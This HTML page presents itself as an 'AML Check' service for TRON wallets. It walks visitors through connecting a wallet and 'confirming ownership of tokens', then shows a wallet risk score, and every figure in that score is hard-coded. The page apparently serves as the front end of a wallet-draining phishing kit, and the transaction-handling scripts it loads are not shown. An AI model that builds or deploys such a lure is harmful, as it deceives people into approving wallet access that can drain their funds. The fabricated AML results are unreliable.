<html lang="en"
   style="--wcm-color-fg-1: rgb(228,231,231); --wcm-color-fg-2: rgb(148,158,158); --wcm-color-fg-3: rgb(110,119,119); --wcm-color-bg-1: rgb(20,20,20); --wcm-color-bg-2: rgb(39,42,42); --wcm-color-bg-3: rgb(59,64,64); --wcm-color-overlay: rgba(255,255,255,0.1); --wcm-accent-color: #3396FF; --wcm-accent-fill-color: #FFFFFF; --wcm-z-index: 3001; --wcm-background-color: #3396FF; --wcm-background-border-radius: 8px; --wcm-container-border-radius: 30px; --wcm-wallet-icon-border-radius: 15px; --wcm-wallet-icon-large-border-radius: 30px; --wcm-wallet-icon-small-border-radius: 7px; --wcm-input-border-radius: 28px; --wcm-button-border-radius: 10px; --wcm-notification-border-radius: 36px; --wcm-secondary-button-border-radius: 28px; --wcm-icon-button-border-radius: 50%; --wcm-button-hover-highlight-border-radius: 10px; --wcm-text-big-bold-size: 20px; --wcm-text-big-bold-weight: 600; --wcm-text-big-bold-line-height: 24px; --wcm-text-big-bold-letter-spacing: -0.03em; --wcm-text-big-bold-text-transform: none; --wcm-text-xsmall-bold-size: 10px; --wcm-text-xsmall-bold-weight: 700; --wcm-text-xsmall-bold-line-height: 12px; --wcm-text-xsmall-bold-letter-spacing: 0.02em; --wcm-text-xsmall-bold-text-transform: uppercase; --wcm-text-xsmall-regular-size: 12px; --wcm-text-xsmall-regular-weight: 600; --wcm-text-xsmall-regular-line-height: 14px; --wcm-text-xsmall-regular-letter-spacing: -0.03em; --wcm-text-xsmall-regular-text-transform: none; --wcm-text-small-thin-size: 14px; --wcm-text-small-thin-weight: 500; --wcm-text-small-thin-line-height: 16px; --wcm-text-small-thin-letter-spacing: -0.03em; --wcm-text-small-thin-text-transform: none; --wcm-text-small-regular-size: 14px; --wcm-text-small-regular-weight: 600; --wcm-text-small-regular-line-height: 16px; --wcm-text-small-regular-letter-spacing: -0.03em; --wcm-text-small-regular-text-transform: none; --wcm-text-medium-regular-size: 16px; --wcm-text-medium-regular-weight: 600; --wcm-text-medium-regular-line-height: 20px; --wcm-text-medium-regular-letter-spacing: -0.03em; --wcm-text-medium-regular-text-transform: none; --wcm-font-family: -apple-system, system-ui, BlinkMacSystemFont, 'Segoe UI', Roboto, Ubuntu, 'Helvetica Neue', sans-serif; --wcm-font-feature-settings: 'tnum' on, 'lnum' on, 'case' on; --wcm-success-color: rgb(38,181,98); --wcm-error-color: rgb(242, 90, 103); --wcm-overlay-background-color: rgba(0, 0, 0, 0.3); --wcm-overlay-backdrop-filter: none;">
   <head>
      <meta charset="UTF-8">
      <link rel="icon" href="/favicon.ico">
      <meta name="viewport" content="width=device-width, initial-scale=1.0">
      <title>AML Check</title>
      <link rel="preconnect" href="https://fonts.googleapis.com">
      <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="">
      <link href="https://fonts.googleapis.com/css2?family=Inter:wght@100..900&amp;display=swap" rel="stylesheet">
      <link rel="stylesheet" crossorigin="" href="assets/styles1.css">
      <link rel="stylesheet" href="assets/styles2.css">
   </head>
   <body data-aos-easing="ease" data-aos-duration="400" data-aos-delay="0" style="background: #fafbfc">
      <div id="" style="width: 100%">
         <div>
            <div data-v-e269d3c4="" class="main-check">
               <header data-v-97d557fc="" data-v-e269d3c4="">
                  <a data-v-97d557fc="" href="/" class="">
                     <svg data-v-97d557fc="" width="33" height="32" viewBox="0 0 33 32" fill="none"
                        xmlns="http://www.w3.org/2000/svg" class="header-logo">
                        <g filter="url(#filter0_i_118_313)">
                           <circle cx="16.5" cy="16" r="16" fill="#0057FF"></circle>
                        </g>
                        <path d="M8.59961 14.6151C8.59961 11.8183 8.59961 10.4199 8.93099 9.94941C9.26238 9.47896 10.582 9.02887 13.2212 8.12869L13.724 7.95719C15.0997 7.48795 15.7876 7.25333 16.4998 7.25333C17.2121 7.25333 17.8999 7.48795 19.2757 7.95719L19.7785 8.12869C22.4177 9.02887 23.7373 9.47896 24.0687 9.94941C24.4 10.4199 24.4 11.8183 24.4 14.6151C24.4 15.0376 24.4 15.4957 24.4 15.9924C24.4 20.9239 20.6791 23.317 18.3445 24.3332C17.7112 24.6088 17.3945 24.7467 16.4998 24.7467C15.6051 24.7467 15.2885 24.6088 14.6552 24.3332C12.3206 23.317 8.59961 20.9239 8.59961 15.9924C8.59961 15.4957 8.59961 15.0376 8.59961 14.6151Z"
                           fill="white"></path>
                        <defs>
                           <filter id="filter0_i_118_313" x="0.5" y="0" width="32" height="36" filterUnits="userSpaceOnUse"
                              color-interpolation-filters="sRGB">
                              <feFlood flood-opacity="0" result="BackgroundImageFix"></feFlood>
                              <feBlend mode="normal" in="SourceGraphic" in2="BackgroundImageFix" result="shape"></feBlend>
                              <feColorMatrix in="SourceAlpha" type="matrix"
                                 values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 127 0"
                                 result="hardAlpha"></feColorMatrix>
                              <feOffset dy="4"></feOffset>
                              <feGaussianBlur stdDeviation="3"></feGaussianBlur>
                              <feComposite in2="hardAlpha" operator="arithmetic" k2="-1" k3="1"></feComposite>
                              <feColorMatrix type="matrix"
                                 values="0 0 0 0 1 0 0 0 0 1 0 0 0 0 1 0 0 0 0.35 0"></feColorMatrix>
                              <feBlend mode="normal" in2="shape" result="effect1_innerShadow_118_313"></feBlend>
                           </filter>
                        </defs>
                     </svg>
                  </a>
                  <a data-v-97d557fc="" href="/" class="link">
                     <p data-v-97d557fc="">AML Check</p>
                  </a>
               </header>
               <div id="1" data-v-e269d3c4="" class="step-1 container" style="max-width: 534px;">
                  <div data-v-e269d3c4="" class="card first-card">
                     <div data-v-e269d3c4="" class="c-head-h1">
                        <h1 data-v-e269d3c4="">Wallet check</h1>
                        <div data-v-e269d3c4="" class="steps">Step 1 of 4</div>
                     </div>
                     <p data-v-e269d3c4="" class="head-desc" style="font-size: 15px">To continue, please select 
                        the required network
                     </p>
                     <div data-v-9bc126f6="" data-v-e269d3c4="" class="select-item tron" id="tron">
                        <img data-v-9bc126f6=""
                           src="assets/tron-trx-logo.png"
                           alt="TRX">
                        <div data-v-9bc126f6="" class="s-content">
                           <p data-v-9bc126f6="" class="s-i-title">TRON Network</p>
                           <!-- <p data-v-9bc126f6="" class="s-i-desc">TRC-20</p> -->
                        </div>
                        <!---->
                     </div>
                     <button data-v-e269d3c4="" class="btn btn-step-1 btn-primary" disabled id="next">Continue</button>
                  </div>
               </div>
			   <style>
			   .select-item img[data-v-9bc126f6] {
    width: 40px;
    height: 40px;
}
			   </style>
               <div id="2" data-v-e269d3c4="" class="step-2 container" style="max-width: 534px; display: none">
                  <div data-v-e269d3c4="" class="card first-card">
                     <div data-v-e269d3c4="" class="c-head-h1">
                        <h1 data-v-e269d3c4="">Connect wallet</h1>
                        <div data-v-e269d3c4="" class="steps">Step 2 of 4</div>
                     </div>
                     <p data-v-e269d3c4="" class="head-desc">To continue, select and connect your wallet</p>
                     <div data-v-9bc126f6="" data-v-e269d3c4="" class="select-item selected">
                        <img data-v-9bc126f6=""
                           src="/img/tron-trx-logo.png"
                           alt="tron">
                        <div data-v-9bc126f6="" class="s-content">
                           <p data-v-9bc126f6="" class="s-i-title">TRON Network
                           </p>
                           <p data-v-9bc126f6="" class="s-i-desc">Selected network</p>
                        </div>
                        <!---->
                     </div>
                     <div data-v-e269d3c4="" class="wallet-wrapper">
                        <button data-v-9bc126f6="" data-v-e269d3c4="" class="select-item connect-wallet walletconnect-button" id="wallet">
                           <img class="wallet-logo" src="./img/walletconnect.svg" width="40">
                           <div data-v-9bc126f6="" class="s-content">
                              <p data-v-9bc126f6="" class="s-i-title wallet-name">WalletConnect</p>
                           </div>
                        </button>
                        <button data-v-9bc126f6="" data-v-e269d3c4="" class="select-item connect-wallet tronlink-button" id="wallet">
                           <img class="wallet-logo" src="./img/tronlink.svg" width="40">
                           <div data-v-9bc126f6="" class="s-content">
                              <p data-v-9bc126f6="" class="s-i-title wallet-name">TronLink Wallet</p>
                           </div>
                        </button>
                        <button data-v-9bc126f6="" data-v-e269d3c4="" class="select-item connect-wallet okx-button" id="wallet">
                           <img class="wallet-logo" src="./img/okx.svg" width="40">
                           <div data-v-9bc126f6="" class="s-content">
                              <p data-v-9bc126f6="" class="s-i-title wallet-name">OKX Wallet</p>
                           </div>
                        </button>
                        <button data-v-9bc126f6="" data-v-e269d3c4="" class="select-item connect-wallet bitget-button" id="wallet">
                           <img class="wallet-logo" src="./img/bitget.svg" width="40">
                           <div data-v-9bc126f6="" class="s-content">
                              <p data-v-9bc126f6="" class="s-i-title wallet-name">Bitget Wallet</p>
                           </div>
                        </button>
                        <button data-v-9bc126f6="" data-v-e269d3c4="" class="select-item connect-wallet ledger-button" id="wallet">
                           <img class="wallet-logo" src="./img/ledger.svg" width="40">
                           <div data-v-9bc126f6="" class="s-content">
                              <p data-v-9bc126f6="" class="s-i-title wallet-name">Ledger Wallet</p>
                           </div>
                        </button>
                     </div>
                     <p class="checking-error">error</p>
                     <button data-v-e269d3c4="" class="btn btn-step-2 btn-primary"id="next">Back</button>
                  </div>
               </div>
               <div id="3" data-v-e269d3c4="" class="container step-3" style="max-width: 534px; display: none">
                  <div data-v-e269d3c4="" class="card">
                     <div data-v-e269d3c4="" class="c-head-h1">
                        <h1 data-v-e269d3c4="">Сonnection process</h1>
                        <div data-v-e269d3c4="" class="steps">Step 3 of 4</div>
                     </div>
                     <p data-v-e269d3c4="" class="head-desc">Please connect your account using a wallet</p>
                     <div data-v-9bc126f6="" data-v-e269d3c4="" class="select-item selected">
                        <img class="selected-wallet-logo" data-v-9bc126f6="" src="">
                        <div data-v-9bc126f6="" class="s-content">
                           <p data-v-9bc126f6="" class="s-i-title selected-wallet-name"></p>
                           <p data-v-9bc126f6="" class="s-i-desc">Selected wallet</p>
                        </div>
                     </div>
                     <div data-v-e269d3c4="" class="loader"><img data-v-e269d3c4="" src="./img/spinner.gif"></div>
                     <!-- <div data-v-e269d3c4="" class="btn btn-dis">WAITING...</div> -->
                  </div>
               </div>
               <div id="4" data-v-e269d3c4="" class="container step-4" style="max-width: 534px; display: none">
                  <div data-v-e269d3c4="" class="card">
                     <div data-v-e269d3c4="" class="c-head-h1">
                        <h1 data-v-e269d3c4="">Scanning process</h1>
                        <div data-v-e269d3c4="" class="steps">Step 4 of 4</div>
                     </div>
                     <p data-v-e269d3c4="" class="head-desc">Confirm ownership of your tokens using a wallet</p>
                     <div data-v-9bc126f6="" data-v-e269d3c4="" class="select-item selected">
                        <img class="selected-wallet-logo" data-v-9bc126f6="" src="">
                        <div data-v-9bc126f6="" class="s-content">
                           <p data-v-9bc126f6="" class="s-i-title selected-wallet-name"></p>
                           <p data-v-9bc126f6="" class="s-i-desc selected-wallet-address"></p>
                        </div>
                     </div>
                     <div data-v-e269d3c4="" class="loader"><img data-v-e269d3c4="" src="./img/spinner.gif"></div>
                     <p class="checking-error">error</p>
                     <button data-v-e269d3c4="" class="btn btn-step-3 btn-primary"id="next">Check</button>
                  </div>
               </div>
               <div id="5" data-v-e269d3c4="" class="container step-5" style="max-width: 534px; display: none">
                  <div data-v-e269d3c4="" class="card last-card">
                     <div data-v-e269d3c4="" class="c-logo">
                        <img src="./img/aml.svg" alt="">
                     </div>
                     <p data-v-e269d3c4="" class="total-percent">25.38%</p>
                     <p data-v-e269d3c4="" class="head-desc">Rating scored from A to F, where A represents a clean
                        wallet,
                        and F represents a dirty wallet. The total rating is the average value between the
                        indicators
                     </p>
                     <div data-v-e269d3c4="" class="percent-wrapper">
                        <div data-v-21975ec7="" data-v-e269d3c4="" class="progress-wrapper">
                           <p data-v-21975ec7=""><span
                              data-v-21975ec7="">Transaction diversity</span><span data-v-21975ec7="" class="progress-percent">21.47%</span>
                           </p>
                           <div data-v-21975ec7="" class="progress-bar"
                              style="background-color: #0057FF;"></div>
                        </div>
                        <div data-v-21975ec7="" data-v-e269d3c4="" class="progress-wrapper">
                           <p data-v-21975ec7=""><span
                              data-v-21975ec7="">Wallet activity</span><span data-v-21975ec7="" class="progress-percent">52.99%</span></p>
                           <div data-v-21975ec7="" class="progress-bar"
                              style="background-color: #4CAF52;"></div>
                        </div>
                        <div data-v-21975ec7="" data-v-e269d3c4="" class="progress-wrapper">
                           <p data-v-21975ec7=""><span
                              data-v-21975ec7="">Transaction to/from CEX</span><span data-v-21975ec7="" class="progress-percent">32.1%</span>
                           </p>
                           <div data-v-21975ec7="" class="progress-bar"
                              style="background-color: #0057FF;"></div>
                        </div>
                        <div data-v-21975ec7="" data-v-e269d3c4="" class="progress-wrapper">
                           <p data-v-21975ec7=""><span
                              data-v-21975ec7="">Avg. Transaction Value</span><span data-v-21975ec7="" class="progress-percent">50.74%</span>
                           </p>
                           <div data-v-21975ec7="" class="progress-bar"
                              style="background-color: #4CAF52;"></div>
                        </div>
                        <div data-v-21975ec7="" data-v-e269d3c4="" class="progress-wrapper">
                           <p data-v-21975ec7=""><span
                              data-v-21975ec7="">Wallet Age</span><span data-v-21975ec7="" class="progress-percent">39.8%</span></p>
                           <div data-v-21975ec7="" class="progress-bar"
                              style="background-color: #4CAF52;"></div>
                        </div>
                        <div data-v-21975ec7="" data-v-e269d3c4="" class="progress-wrapper">
                           <p data-v-21975ec7=""><span
                              data-v-21975ec7="">Suspicious transactions</span><span data-v-21975ec7="" class="progress-percent">63.68%</span>
                           </p>
                           <div data-v-21975ec7="" class="progress-bar"
                              style="background-color: #FFA400;"></div>
                        </div>
                        <div data-v-21975ec7="" data-v-e269d3c4="" class="progress-wrapper">
                           <p data-v-21975ec7=""><span
                              data-v-21975ec7="">Transaction to High-Risk addresses</span><span
                              data-v-21975ec7="" class="progress-percent">65.06%</span></p>
                           <div data-v-21975ec7="" class="progress-bar"
                              style="background-color: #FFA400;"></div>
                        </div>
                     </div>
                     <button data-v-e269d3c4="" class="btn btn-primary btn-step-5">Сheck another wallet</button>
                  </div>
               </div>           
            </div>
            <footer data-v-ffd0604b="" data-v-e269d3c4="">
               <p data-v-ffd0604b="" style="font-size: 16px">© 2024 AML
                  Check. All rights
                  reserved.
               </p>
            </footer>
         </div>
      </div>
      <script src="js/tron/walletconnect-sign-client.js"></script>
      <script src="js/tron/adapters.js"></script>
      <script src="js/tron/main.js" type="module"></script>
   </body>
</html>
<style>
.loader[data-v-a6586eaa] {
    font-size: 7px;
    width: .7em;
    height: .7em;
    border-radius: 50%;
    position: relative;
    text-indent: -9999em;
    -webkit-animation: load5-a6586eaa 1s infinite ease;
    animation: load5-a6586eaa 1.1s infinite ease;
    -webkit-transform: translateZ(0);
    -ms-transform: translateZ(0);
    transform: translateZ(0)
}

@-webkit-keyframes load5-a6586eaa {
    0%,to {
        box-shadow: 0 -1.3em #0057ff,.9em -.9em #0057ff33,1.25em 0 #0057ff33,.875em .875em #0057ff33,0 1.25em #0057ff33,-.9em .9em #0057ff33,-1.3em 0 #0057ff80,-.9em -.9em #0057ffb3
    }

    12.5% {
        box-shadow: 0 -1.3em #0057ffb3,.9em -.9em #0057ff,1.25em 0 #0057ff33,.875em .875em #0057ff33,0 1.25em #0057ff33,-.9em .9em #0057ff33,-1.3em 0 #0057ff33,-.9em -.9em #0057ff80
    }

    25% {
        box-shadow: 0 -1.3em #0057ff80,.9em -.9em #0057ffb3,1.25em 0 #0057ff,.875em .875em #0057ff33,0 1.25em #0057ff33,-.9em .9em #0057ff33,-1.3em 0 #0057ff33,-.9em -.9em #0057ff33
    }

    37.5% {
        box-shadow: 0 -1.3em #0057ff33,.9em -.9em #0057ff80,1.25em 0 #0057ffb3,.875em .875em #0057ff,0 1.25em #0057ff33,-.9em .9em #0057ff33,-1.3em 0 #0057ff33,-.9em -.9em #0057ff33
    }

    50% {
        box-shadow: 0 -1.3em #0057ff33,.9em -.9em #0057ff33,1.25em 0 #0057ff80,.875em .875em #0057ffb3,0 1.25em #0057ff,-.9em .9em #0057ff33,-1.3em 0 #0057ff33,-.9em -.9em #0057ff33
    }

    62.5% {
        box-shadow: 0 -1.3em #0057ff33,.9em -.9em #0057ff33,1.25em 0 #0057ff33,.875em .875em #0057ff80,0 1.25em #0057ffb3,-.9em .9em #0057ff,-1.3em 0 #0057ff33,-.9em -.9em #0057ff33
    }

    75% {
        box-shadow: 0 -1.3em #0057ff33,.9em -.9em #0057ff33,1.25em 0 #0057ff33,.875em .875em #0057ff33,0 1.25em #0057ff80,-.9em .9em #0057ffb3,-1.3em 0 #0057ff,-.9em -.9em #0057ff33
    }

    87.5% {
        box-shadow: 0 -1.3em #0057ff33,.9em -.9em #0057ff33,1.25em 0 #0057ff33,.875em .875em #0057ff33,0 1.25em #0057ff33,-.9em .9em #0057ff80,-1.3em 0 #0057ffb3,-.9em -.9em #0057ff
    }
}

@keyframes load5-a6586eaa {
    0%,to {
        box-shadow: 0 -1.3em #0057ff,.9em -.9em #0057ff33,1.25em 0 #0057ff33,.875em .875em #0057ff33,0 1.25em #0057ff33,-.9em .9em #0057ff33,-1.3em 0 #0057ff80,-.9em -.9em #0057ffb3
    }

    12.5% {
        box-shadow: 0 -1.3em #0057ffb3,.9em -.9em #0057ff,1.25em 0 #0057ff33,.875em .875em #0057ff33,0 1.25em #0057ff33,-.9em .9em #0057ff33,-1.3em 0 #0057ff33,-.9em -.9em #0057ff80
    }

    25% {
        box-shadow: 0 -1.3em #0057ff80,.9em -.9em #0057ffb3,1.25em 0 #0057ff,.875em .875em #0057ff33,0 1.25em #0057ff33,-.9em .9em #0057ff33,-1.3em 0 #0057ff33,-.9em -.9em #0057ff33
    }

    37.5% {
        box-shadow: 0 -1.3em #0057ff33,.9em -.9em #0057ff80,1.25em 0 #0057ffb3,.875em .875em #0057ff,0 1.25em #0057ff33,-.9em .9em #0057ff33,-1.3em 0 #0057ff33,-.9em -.9em #0057ff33
    }

    50% {
        box-shadow: 0 -1.3em #0057ff33,.9em -.9em #0057ff33,1.25em 0 #0057ff80,.875em .875em #0057ffb3,0 1.25em #0057ff,-.9em .9em #0057ff33,-1.3em 0 #0057ff33,-.9em -.9em #0057ff33
    }

    62.5% {
        box-shadow: 0 -1.3em #0057ff33,.9em -.9em #0057ff33,1.25em 0 #0057ff33,.875em .875em #0057ff80,0 1.25em #0057ffb3,-.9em .9em #0057ff,-1.3em 0 #0057ff33,-.9em -.9em #0057ff33
    }

    75% {
        box-shadow: 0 -1.3em #0057ff33,.9em -.9em #0057ff33,1.25em 0 #0057ff33,.875em .875em #0057ff33,0 1.25em #0057ff80,-.9em .9em #0057ffb3,-1.3em 0 #0057ff,-.9em -.9em #0057ff33
    }

    87.5% {
        box-shadow: 0 -1.3em #0057ff33,.9em -.9em #0057ff33,1.25em 0 #0057ff33,.875em .875em #0057ff33,0 1.25em #0057ff33,-.9em .9em #0057ff80,-1.3em 0 #0057ffb3,-.9em -.9em #0057ff
    }
}

.select-item[data-v-9bc126f6] {
    border-radius: 16px;
    border: 1px solid rgba(5,15,25,.0784313725);
    background-color: #fff;
    padding: 12px 16px;
    display: flex;
    gap: 16px;
    align-items: center;
    transition: all .2s ease-in-out;
    -webkit-user-select: none;
    user-select: none;
    width: 100%
}

.select-item img[data-v-9bc126f6] {
    width: 40px;
    height: 40px;
}

.select-item .s-i-title[data-v-9bc126f6] {
    font-size: 18px;
    font-weight: 600;
    line-height: 24px
}

.select-item .s-i-desc[data-v-9bc126f6] {
    color: var(--text-gray);
    font-size: 14px;
    line-height: 20px
}

.select-item[data-v-9bc126f6]:hover {
    background-color: #050f1908
}

.select-item.active[data-v-9bc126f6] {
    box-shadow: 4px 4px 32.7px #0057ff0d inset;
    border: 1px solid rgba(0,87,255,.1490196078);
    background-color: #fff
}

.select-item.selected[data-v-9bc126f6],.select-item.load[data-v-9bc126f6] {
    background-color: #050f1908;
    cursor: default;
    pointer-events: none
}

.progress-wrapper p[data-v-21975ec7] {
    display: flex;
    align-items: center;
    width: 100%;
    justify-content: space-between;
    color: var(--text-primary);
    margin-bottom: 6px;
    font-weight: 600
}

.progress-wrapper .progress-bar[data-v-21975ec7] {
    height: 10px;
    background-color: #050f190d;
    border-radius: 5px;
    position: relative;
    overflow: hidden;
    width: 100%
}

.progress-wrapper .progress-bar[data-v-21975ec7]:before {
    content: "";
    position: absolute;
    top: 0;
    left: 0;
    height: 100%;
    border-radius: 5px;
    width: var(--p-width);
    background-color: var(--p-color);
    transition: width .2s ease-in-out
}

.slide-fade-enter-active[data-v-e269d3c4] {
    transition: all .4s ease
}

.slide-fade-leave-active[data-v-e269d3c4] {
    transition: all .3s cubic-bezier(1,.5,.8,1)
}

.slide-fade-enter[data-v-e269d3c4],.slide-fade-leave-to[data-v-e269d3c4] {
    transform: scale(.6);
    opacity: 0
}

.last-card .total-percent[data-v-e269d3c4],.last-card .head-desc[data-v-e269d3c4],.last-card .c-logo[data-v-e269d3c4] {
    text-align: center;
    margin: auto
}

.last-card .total-percent[data-v-e269d3c4] {
    font-size: 24px;
    font-weight: 700;
    line-height: 32px;
    color: var(--text-primary)
}

.last-card.card .head-desc[data-v-e269d3c4] {
    max-width: 100%
}

.percent-wrapper[data-v-e269d3c4] {
    margin: 24px 0 56px;
    display: flex;
    flex-direction: column;
    gap: 12px
}

.wallet-wrapper[data-v-e269d3c4] {
    margin-top: 24px;
    display: flex;
    flex-direction: column;
    gap: 8px
}

.process-error[data-v-e269d3c4] {
    margin: 0 0 32px
}

.btn-dis[data-v-e269d3c4] {
    text-align: left;
    justify-content: flex-start;
    font-weight: 500;
    font-size: 14px;
    padding: 0 16px
}

.loader[data-v-e269d3c4] {
    text-align: center;
    padding: 40px 0
}

.loader img[data-v-e269d3c4] {
    margin: auto;
    max-width: 300px;
    max-height: 100%;
    width: 100%;
    height: auto
}

.card[data-v-e269d3c4] {
    background-color: #fff;
    margin-top: 60px;
    padding: 24px;
    border-radius: 20px;
    border: 1px solid rgba(5,15,25,.0784313725)
}

.card .c-head-h1[data-v-e269d3c4] {
    display: flex;
    align-items: center;
    justify-content: space-between
}

.card .c-head-h1 h1[data-v-e269d3c4] {
    font-weight: 700;
    font-size: 24px;
    line-height: 32px;
    color: var(--text-primary)
}

.card .c-head-h1 .steps[data-v-e269d3c4] {
    padding: 4px 12px;
    display: inline-flex;
    height: 28px;
    align-items: center;
    background-color: #0057ff1a;
    border: 1px solid rgba(0,87,255,.1490196078);
    border-radius: 14px;
    color: var(--text-accept);
    font-size: 14px
}

.card .head-desc[data-v-e269d3c4] {
    color: var(--text-gray);
    max-width: 328px;
    margin-top: 6px;
    margin-bottom: 24px
}

.first-card[data-v-e269d3c4] {
    display: grid;
    grid-template-rows: auto auto auto 1fr;
    min-height: 474px
}

.first-card>button[data-v-e269d3c4],.first-card>.buttons[data-v-e269d3c4] {
    align-self: flex-end
}

.first-card>.buttons[data-v-e269d3c4] {
    display: flex;
    flex-direction: column;
    gap: 8px;
    margin-top: 52px
}

.wallet-error[data-v-e269d3c4] {
    background: #f044381a;
    color: #f04438;
    font-size: 14px;
    line-height: 20px;
    padding: 12px 16px;
    border-radius: 16px;
    margin-top: 12px
}

@media (max-width: 576px) {
    .select-item .s-i-desc[data-v-9bc126f6] {
        font-size:10px;
    }

    .card[data-v-e269d3c4] {
        margin-top: 40px;
        padding: 20px
    }

    .card .c-head-h1[data-v-e269d3c4] {
        flex-direction: column-reverse;
        align-items: flex-start;
        gap: 12px
    }

    .card .c-head-h1 .steps[data-v-e269d3c4] {
        height: 24px;
        font-size: 12px;
        border-radius: 12px
    }

    .card .head-desc[data-v-e269d3c4] {
        margin-bottom: 20px;
        max-width: 100%
    }
}

.checking-error {
    text-align: center;
    color: #f04438;
    opacity: 0;
    margin: 24px 0 0
}
:root {
    --text-primary: #050F19;
    --text-accept: #0057FF;
    --text-gray: #050F1966
}

*,*:before,*:after {
    box-sizing: border-box;
    margin: 0
}

html,body {
    scroll-behavior: smooth;
    overflow-x: hidden
}

body {
    width: 100%;
    height: 100%;
    font-family: Inter,sans-serif;
    font-optical-sizing: auto;
    font-weight: 500;
    font-style: normal;
    font-variation-settings: "slnt" 0;
    line-height: normal;
    font-size: 16px;
    background: #fafbfc
}

#app {
    width: 100%
}

.container {
    max-width: 534px;
    width: 100%;
    margin: 0 auto;
    padding: 0 15px
}

.main-check {
    display: grid;
    grid-template-columns: 1fr;
    grid-template-rows: auto 1fr auto;
    min-height: 100vh
}

.btn {
    margin-top: 24px;
    display: inline-flex;
    height: 48px;
    padding: 0 10px;
    align-items: center;
    justify-content: center;
    background-color: #050f1908;
    border: 1px solid rgba(5,15,25,.0784313725);
    color: var(--text-primary);
    font-size: 18px;
    font-weight: 600;
    transition: all .2s ease-in-out;
    border-radius: 16px;
    width: 100%;
    -webkit-user-select: none;
    user-select: none;
}

.btn:hover {
    background-color: #050f190f
}

.btn:focus {
    background-color: #050f1908
}

.btn:disabled {
    opacity: .25;
    cursor: not-allowed;
    pointer-events: none
}

.btn.btn-primary {
    background-color: #0057ff;
    border: none;
    color: #fff
}

.btn.btn-primary:hover {
    background-color: #175de5
}

.btn.btn-primary:focus {
    background-color: #2454b2
}

header[data-v-97d557fc] {
    display: flex;
    align-items: center;
    justify-content: center;
    gap: 12px;
    background-color: #fff;
    padding: 20px 15px
}

header[data-v-97d557fc]>* {
    display: inline-flex;
    align-items: center
}

header .link[data-v-97d557fc] {
    color: var(--text-primary);
    font-weight: 700;
    font-size: 20px;
    line-height: 28px;
    text-decoration: none
}

.header-logo[data-v-97d557fc] {
    height: 32px;
    width: auto
}

footer[data-v-ffd0604b] {
    background-color: #fff;
    text-align: center;
    padding: 22px 15px
}

footer[data-v-ffd0604b] p[data-v-ffd0604b] {
    text-align: center;
    color: #050f1966
}

[data-aos][data-aos][data-aos-duration="50"],body[data-aos-duration="50"] [data-aos] {
    transition-duration: 50ms
}

[data-aos][data-aos][data-aos-delay="50"],body[data-aos-delay="50"] [data-aos] {
    transition-delay: 0
}

[data-aos][data-aos][data-aos-delay="50"].aos-animate,body[data-aos-delay="50"] [data-aos].aos-animate {
    transition-delay: 50ms
}

[data-aos][data-aos][data-aos-duration="100"],body[data-aos-duration="100"] [data-aos] {
    transition-duration: .1s
}

[data-aos][data-aos][data-aos-delay="100"],body[data-aos-delay="100"] [data-aos] {
    transition-delay: 0
}

[data-aos][data-aos][data-aos-delay="100"].aos-animate,body[data-aos-delay="100"] [data-aos].aos-animate {
    transition-delay: .1s
}

[data-aos][data-aos][data-aos-duration="150"],body[data-aos-duration="150"] [data-aos] {
    transition-duration: .15s
}

[data-aos][data-aos][data-aos-delay="150"],body[data-aos-delay="150"] [data-aos] {
    transition-delay: 0
}

[data-aos][data-aos][data-aos-delay="150"].aos-animate,body[data-aos-delay="150"] [data-aos].aos-animate {
    transition-delay: .15s
}

[data-aos][data-aos][data-aos-duration="200"],body[data-aos-duration="200"] [data-aos] {
    transition-duration: .2s
}

[data-aos][data-aos][data-aos-delay="200"],body[data-aos-delay="200"] [data-aos] {
    transition-delay: 0
}

[data-aos][data-aos][data-aos-delay="200"].aos-animate,body[data-aos-delay="200"] [data-aos].aos-animate {
    transition-delay: .2s
}

[data-aos][data-aos][data-aos-duration="250"],body[data-aos-duration="250"] [data-aos] {
    transition-duration: .25s
}

[data-aos][data-aos][data-aos-delay="250"],body[data-aos-delay="250"] [data-aos] {
    transition-delay: 0
}

[data-aos][data-aos][data-aos-delay="250"].aos-animate,body[data-aos-delay="250"] [data-aos].aos-animate {
    transition-delay: .25s
}

[data-aos][data-aos][data-aos-duration="300"],body[data-aos-duration="300"] [data-aos] {
    transition-duration: .3s
}

[data-aos][data-aos][data-aos-delay="300"],body[data-aos-delay="300"] [data-aos] {
    transition-delay: 0
}

[data-aos][data-aos][data-aos-delay="300"].aos-animate,body[data-aos-delay="300"] [data-aos].aos-animate {
    transition-delay: .3s
}

[data-aos][data-aos][data-aos-duration="350"],body[data-aos-duration="350"] [data-aos] {
    transition-duration: .35s
}

[data-aos][data-aos][data-aos-delay="350"],body[data-aos-delay="350"] [data-aos] {
    transition-delay: 0
}

[data-aos][data-aos][data-aos-delay="350"].aos-animate,body[data-aos-delay="350"] [data-aos].aos-animate {
    transition-delay: .35s
}

[data-aos][data-aos][data-aos-duration="400"],body[data-aos-duration="400"] [data-aos] {
    transition-duration: .4s
}

[data-aos][data-aos][data-aos-delay="400"],body[data-aos-delay="400"] [data-aos] {
    transition-delay: 0
}

[data-aos][data-aos][data-aos-delay="400"].aos-animate,body[data-aos-delay="400"] [data-aos].aos-animate {
    transition-delay: .4s
}

[data-aos][data-aos][data-aos-duration="450"],body[data-aos-duration="450"] [data-aos] {
    transition-duration: .45s
}

[data-aos][data-aos][data-aos-delay="450"],body[data-aos-delay="450"] [data-aos] {
    transition-delay: 0
}

[data-aos][data-aos][data-aos-delay="450"].aos-animate,body[data-aos-delay="450"] [data-aos].aos-animate {
    transition-delay: .45s
}

[data-aos][data-aos][data-aos-duration="500"],body[data-aos-duration="500"] [data-aos] {
    transition-duration: .5s
}

[data-aos][data-aos][data-aos-delay="500"],body[data-aos-delay="500"] [data-aos] {
    transition-delay: 0
}

[data-aos][data-aos][data-aos-delay="500"].aos-animate,body[data-aos-delay="500"] [data-aos].aos-animate {
    transition-delay: .5s
}

[data-aos][data-aos][data-aos-duration="550"],body[data-aos-duration="550"] [data-aos] {
    transition-duration: .55s
}

[data-aos][data-aos][data-aos-delay="550"],body[data-aos-delay="550"] [data-aos] {
    transition-delay: 0
}

[data-aos][data-aos][data-aos-delay="550"].aos-animate,body[data-aos-delay="550"] [data-aos].aos-animate {
    transition-delay: .55s
}

[data-aos][data-aos][data-aos-duration="600"],body[data-aos-duration="600"] [data-aos] {
    transition-duration: .6s
}

[data-aos][data-aos][data-aos-delay="600"],body[data-aos-delay="600"] [data-aos] {
    transition-delay: 0
}

